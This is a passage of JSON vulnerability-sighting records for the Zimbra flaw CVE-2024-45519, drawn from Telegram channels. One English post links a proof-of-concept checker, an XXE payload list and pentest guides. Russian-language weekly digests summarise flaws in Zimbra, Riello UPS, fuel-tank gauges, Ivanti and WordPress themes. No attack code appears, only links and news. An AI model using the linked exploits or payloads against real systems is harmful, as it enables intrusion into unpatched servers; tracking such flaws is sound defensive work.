"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7500", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "9f5ab129-dff9-4459-b305-04f09859b58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6248", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0440\u0435\u043d\u0434\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n1. \u0412\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45519 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u043e\u0447\u0442\u044b postjournal \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Zimbra Collaboration, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMTP.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u043b\u0438 \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b, \u043f\u043e\u043a\u0430\u0437\u0430\u0432 \u0432\u0438\u0434\u0435\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043a\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0421yberok \u043d\u0430 \u0441\u0432\u043e\u0438\u0445 \u0440\u0430\u0434\u0430\u0440\u0430\u0445 \u0421\u041a\u0418\u041f\u0410 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 10\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0439 Zimbra Collaboration \u0432 \u0420\u0443\u043d\u0435\u0442\u0435, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u043e\u043b\u0435\u0435 3\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 SMTP \u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044f\u0441\u044c \u0440\u0438\u0441\u043a\u0443 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2024-45519.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0448\u043b\u044e\u0437\u044b Zimbra Collaboration.\n\n2. \u0410\u0432\u0441\u0442\u0440\u0438\u0439\u0441\u043a\u0430\u044f CyberDanube \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0418\u0411\u041f-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 Riello UPS.\n\n\u041a\u0430\u043a \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u0441\u043c\u043e\u0433 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043a\u0430\u0440\u0442\u0435 \u0441\u0432\u044f\u0437\u0438 NetMan 204 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0418\u0411\u041f Riello \u0432 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0442\u0438.\n\n\u041e\u0434\u043d\u0430 \u043d\u0438\u0445 CVE-2024-8877 - \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u0430.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2024-8878 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f.\n\nCyberDanube \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0438\u044e\u043d\u0435, \u043e\u0434\u043d\u0430\u043a\u043e Riello \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u0439\u043c\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0435\u043c \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c.\n\n3. \u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Bitsight \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043e\u0446\u0435\u043d\u043a\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u0440\u043e\u0432\u043d\u0435\u043c\u0435\u0440\u0430\u0445 ATG \u0432 \u0431\u0430\u043a\u0430\u0445, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432 10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0443 \u043f\u044f\u0442\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 Alisonic, Dover Corp, Franklin Fueling Systems, Maglink \u0438 Omntec, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0441\u0435\u043a\u0442\u043e\u0440\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437\u0443\u0447\u0438\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c ATG \u043e\u0442 \u043f\u044f\u0442\u0438 \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 10 \u0434\u044b\u0440 (\u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u044f\u0434 0-day), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 Maglink LX \u0438 LX4, OPW SiteSentinel, Proteus OEL8000, Alisonic Sibylla \u0438 Franklin TS-550.\n\n\u0421\u0435\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u044b \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u0440\u043e\u0432\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438. \u041e\u043d\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0438 SQL. \u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 - \u044d\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 XSS \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, EoP \u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0447\u0442\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432.\u00a0\n\n\u0412\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043d\u0438\u0445 - \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 DoS \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. Bitsight \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u043d\u0430\u043d\u0435\u0441\u0442\u0438 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0449\u0435\u0440\u0431.\u00a0\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 Bitsight \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u044b\u0441\u044f\u0447\u0438 \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 ATG, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432 \u0421\u0428\u0410 \u0438 \u0415\u0432\u0440\u043e\u043f\u0435, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0430\u044d\u0440\u043e\u043f\u043e\u0440\u0442\u0430\u0445, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445, \u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f\u0445 \u0438 \u0432 \u043a\u043e\u043c\u043c\u0443\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431\u0430\u0445.\u00a0\n\n4. \u041a\u0430\u043a \u0438 \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u0432\u0437\u044f\u0442\u044c \u043f\u043e\u0434 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b Ivanti Virtual Traffic Manager (vTM). \u0410\u0442\u0430\u043a\u0438 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 CVE-2024-7593, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Ivanti \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435, \u0438 \u043d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u0443\u0436\u0435 \u0438\u043c\u0435\u043b\u0441\u044f PoC.\n\n5. VulnCheck\u00a0\u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0432\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f APT Flax Typhoon \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430 \u0434\u043d\u044f\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Raptor Train. \u0418\u0445 \u0447\u0438\u0441\u043b\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u043e - 66!", "creation_timestamp": "2024-09-25T17:30:05.000000Z"}, {"uuid": "f812860e-ad60-4ef1-931c-57fb064f835e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6268", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c \u0441 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0432\u043a\u0440\u0430\u0442\u0446\u0435 \u043f\u043e \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u043c \u043d\u0430 \u043d\u0435\u0434\u0435\u043b\u0435 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:\n\n1. \u0424\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u0430\u044f LEXFO \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0447\u0440\u0435\u0437\u0432\u044b\u0447\u0430\u0439\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 JupiterX WordPress \u0438 WooCommerce. \n\n\u042d\u0442\u043e \u043e\u0431\u0445\u043e\u0434 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 RCE, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0430\u0439\u0442\u044b.\n\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0444\u043e\u0440\u043c\u0443 \u0441 \u043f\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u0430.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c JupiterX \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0441\u044c\u043c\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0445 \u043d\u0430 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0435 ThemeForest \u0441 \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c 178 000 \u043f\u0440\u043e\u0434\u0430\u0436.\n\n2. VideoLAN \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043c\u0435\u0434\u0438\u0430\u043f\u043b\u0435\u0435\u0440\u0430 VLC \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a MMS.\n\n3. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Project Discovery \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b Zimbra, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-45519 \u0438 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0443 PostJournal, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0445.\n\nZimbra \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0437\u0430 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c.\n\n4. \u00a0\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u041f\u0430\u0442\u0440\u0438\u043a \u041a\u043e\u0432\u0430\u043b\u044c\u0441\u043a\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 